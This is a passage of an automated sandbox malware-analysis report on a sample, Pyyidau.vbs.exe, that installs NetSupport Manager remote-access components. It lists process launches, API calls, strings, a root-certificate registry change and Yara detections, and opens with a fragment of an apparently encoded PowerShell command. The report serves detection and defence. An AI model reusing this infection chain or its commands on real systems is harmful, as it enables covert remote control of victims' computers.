gacgblageazabdadoaogbhaguadabeag8abqbhagkabgaoackalgbmag8ayqbkacgajabyahmababtahcabqbvaheazwbrahoakqa7acaajabbahyazgbuahgadqbrag4acgbtag0aiaa9acaajaboagyaawbmagcadab0ahialgbfag4adabyahkauabvagkabgb0adsaiabbafmaeqbzahqazqbtac4arablagwazqbnageadablaf0aoga6aemacgblageadablaeqazqbsaguazwbhahqazqaoafsaqqbjahqaaqbvag4axqasacaajabbahyazgbuahgadqbrag4acgbtag0algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakaeeadgbmag4aeab1agsabgbyag0abqauae4ayqbtaguakqauaeqaeqbuageabqbpagmasqbuahyabwbraguakaapacaafaagae8adqb0ac0atgb1agwabaa=Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI1387.tmp "c:\windows\installer\msi1387.tmp" /g"c:\program files (x86)\netsupport\netsupport manager\" /ev"netsupport school" /ef".\log files" /ef".\bookmarks" /ef".\tests" /ef".\store" /ef".\inv" /ef".\resources" /ef".\help" /ef".\image" /ef".\sound" /ef".\video" /ea /ex /ec /q /v /q /i * Jump to behavior
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005CA250 GetModuleFileNameW,GetCurrentProcessId,wsprintfW,CreateEventW,CreateEventW,GetLastError,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,wsprintfW,CreateEventW,GetLastError,CloseHandle,wsprintfW,CreateEventW,LocalFree,CreateEventW,CreateEventW,CreateEventW,CreateThread,SetThreadPriority,25_2_005CA250
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005CA6C0 AllocateAndInitializeSid,LoadLibraryW,GetProcAddress,FreeSid,FreeLibrary,SetLastError,25_2_005CA6C0
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: a+tca+tLogSOFTWARE\Productive Computer Insight\%swinstallwinst32Log=winst32.log%04d-%02d-%02d %02d:%02d:%02d.%03d defaultGetNativeSystemInfo missingcpu type is %d, probably not x64cpu is x64, setting wow64=TRUEiswow64process, setting wow64=TRUEPCISYS started okPCISYS created okPCISYS not created, already existsPCISYS not created, e=%dsystem32\drivers\pcisys.sysVideo InitPendingFileRenameOperationsSYSTEM\CurrentControlSet\Control\Session Manager\Client32Provider.dll\cicClient32Provider.dllRegisterClient32Provider reg=%dSoftware\Policies\NetSupport\Client\StandardScreenScrapeDllInstall(%s) inst=%d, cmd=%lsDllInstallInstallShellExt Doneerror - delete on restartCopy errorCopy %s to %sRename %s to %s - %sDelete %s - %serrorokPCIShellExt.newPCIShellExt.oldPCIShellExt.dllInstallShellExt %d, doshell=%dShell_TrayWndUnloading %s
                                Source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: echo\tempfile.$$$\autoexec.nt\autoexec.tmpGetSystemWow64DirectoryAkernel32*old_wndproc == fpe:\nsmsrc\nsm\1410\1410\nt\winst32.cPROGMANrb+.lnk\Profiles\All Users\Start Menu\Programs\YesOnNSMWControl32NSMMainSeShutdownPrivilegebufAssert failed, file %hs, line %d
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: jFoxitReaderSubmitPeakFrameIntelNSM AppBar Callback MessageShell_TrayWnd
                                Source: MSIF373.tmp, MSIF985.tmp, MSI1387.tmpBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: lProgman
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: jProgman
                                Source: winst64.exe, 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, winst64.exe, 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: %04d-%02d-%02d %02d:%02d:%02d.%03d defaultPCISYS started okPCISYS created okPCISYS not created, already existsPCISYS not created, e=%dsystem32\drivers\pcisys.sysVideo InitPendingFileRenameOperationsSYSTEM\CurrentControlSet\Control\Session ManagerDllUnregisterServerDllRegisterServer\Client32Provider.dll\cicClient32Provider.dllRegisterClient32Provider reg=%dclient32.inirtclient32u.iniSoftware\Policies\NetSupport\Client\StandardclientScreenScrapeDllInstall(%s) inst=%d, cmd=%lsDllInstallInstallShellExt Doneerror - delete on restartCopy errorCopy %s to %sRename %s to %s - %sDelete %s - %sokerrorPCIShellExt64.newPCIShellExt64.oldPCIShellExt64.dllInstallShellExt %d, doshell=%dShell_TrayWndUnloading %s
                                Source: MSIF373.tmp, MSIF985.tmp, MSI1387.tmpBinary or memory string: PROGMAN
                                Source: pcicfgui_client.exe, 00000022.00000002.114293124962.000000006C372000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: Sorry, this is not supported on versions of Windows NT before 4.0. Please refer to the help file for details on how to do this in Program Manager. Configure TCP/IP Client Browsing+&Broadcast Addresses (or Client Addresses):.Print Files (*.prn)|*.prn|All Files (*.*)|*.*|.Sound Files (*.wav)|*.wav|All Files (*.*)|*.*|
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanError closing winsta, e=%d
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,25_2_005F6474
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,25_2_006086E2
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,25_2_00602744
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoA,25_2_00602839
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoW,25_2_006028E0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,25_2_0060293B
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoA,25_2_00602B0C
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: EnumSystemLocalesA,25_2_00602BF8
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: EnumSystemLocalesA,25_2_00602BCE
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: EnumSystemLocalesA,25_2_00602C5F
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,25_2_00602C9B
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: GetLocaleInfoA,25_2_0060BE77
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,27_2_00936474
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,27_2_009486E2
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,27_2_00942744
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoW,27_2_009428E0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoA,27_2_00942839
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,27_2_0094293B
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: EnumSystemLocalesA,27_2_00942BCE
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: EnumSystemLocalesA,27_2_00942BF8
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoA,27_2_00942B0C
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,27_2_00942C9B
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: EnumSystemLocalesA,27_2_00942C5F
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: GetLocaleInfoA,27_2_0094BE77
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_0079C73C
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_00794878
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,28_2_0079C831
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,28_2_0079C8D8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,28_2_0079C933
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,28_2_0079CB04
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,28_2_0079CBF0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,28_2_0079CBC6
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,28_2_0079CC57
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,28_2_0079CC93
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,28_2_007A576A
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,28_2_007A5E2D
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,29_2_01006474
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,29_2_01012744
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,29_2_010186E2
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,29_2_0101293B
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoA,29_2_01012839
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoW,29_2_010128E0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoA,29_2_01012B0C
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: EnumSystemLocalesA,29_2_01012BCE
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: EnumSystemLocalesA,29_2_01012BF8
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: EnumSystemLocalesA,29_2_01012C5F
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,29_2_01012C9B
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: GetLocaleInfoA,29_2_0101BE77
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FBF9E0 OpenServiceW,GetLastError,SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,SetupDiEnumDeviceInfo,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,SetupDiCallClassInstaller,GetLastError,SetupDiDestroyDeviceInfoList,29_2_00FBF9E0
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI1387.tmpQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI1387.tmpQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DF030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,OutputDebugStringW,LeaveCriticalSection,25_2_005DF030
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D5490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,25_2_005D5490
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005F0EEB GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,25_2_005F0EEB
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DF6D0 GetModuleFileNameW,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetCurrentProcess,FreeLibrary,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,25_2_005DF6D0
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 BlobJump to behavior
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C7600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,25_2_005C7600
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00907600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,27_2_00907600
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_00774E20 SHParseDisplayName,SHBindToParent,CoTaskMemFree,28_2_00774E20
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FD7600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,29_2_00FD7600
                                Source: Yara matchFile source: 34.2.pcicfgui_client.exe.701b0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.pcicfgui_client.exe.df0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.client32.exe.701b0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.0.client32.exe.1f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.client32.exe.1f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.0.pcicfgui_client.exe.df0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.client32.exe.6c920000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.2.client32.exe.6c9a0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.8cd1448.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 28.2.checkdvd.exe.750000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.client32.exe.6c810000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.2.client32.exe.6cd18bc0.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.0.client32.exe.1f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.client32.exe.6c9a0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.0.MSI1387.tmp.fa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 31.0.MSI23E6.tmp.b50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.8cdf648.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.5f9b138.23.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.client32.exe.6c8f0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.2.MSI1387.tmp.fa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 27.0.MSIF985.tmp.8d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.client32.exe.6cd18bc0.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 31.2.MSI23E6.tmp.b50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.2.pcicfgui_client.exe.df0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.2.client32.exe.701b0000.8.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.8cdf648.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.2.client32.exe.1f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 27.2.MSIF985.tmp.8d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.0.MSIF373.tmp.590000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 28.0.checkdvd.exe.750000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.0.pcicfgui_client.exe.df0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.MSIF373.tmp.590000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.2.client32.exe.6c600000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.8e41848.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.0.winst64.exe.7ff679350000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.2.winst64.exe.7ff679350000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.5f8031c.24.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.5f9b138.23.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.2.pcicfgui_client.exe.30e0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.8e26c48.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.wscript.exe.8e41848.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.client32.exe.6cae0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.2.client32.exe.6cae0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000020.00000003.114561669687.0000000000A25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.115179006644.0000000001266000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115069209517.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.115177447611.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000002.114215734060.00000000007BB000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114081150460.000000000297D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.114274483585.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000000.114151205351.0000000000977000.00000008.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.115175806998.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000002.114281184741.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115020632793.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114047457566.000000000B674000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114080468749.0000000002958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.115176197402.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115114283610.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114080518397.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.115176196956.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114080181911.0000000002968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114080266581.000000000296F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000002.114215767889.00000000007CA000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000000.114214596852.00000000007BB000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000000.114260013532.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.114270878224.0000000000BF7000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114080419408.0000000002952000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115008463407.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000002.114281372706.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.114263957183.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.115188136908.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115080634297.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.114241948191.0000000001047000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000000.114272266016.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000000.114273968931.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
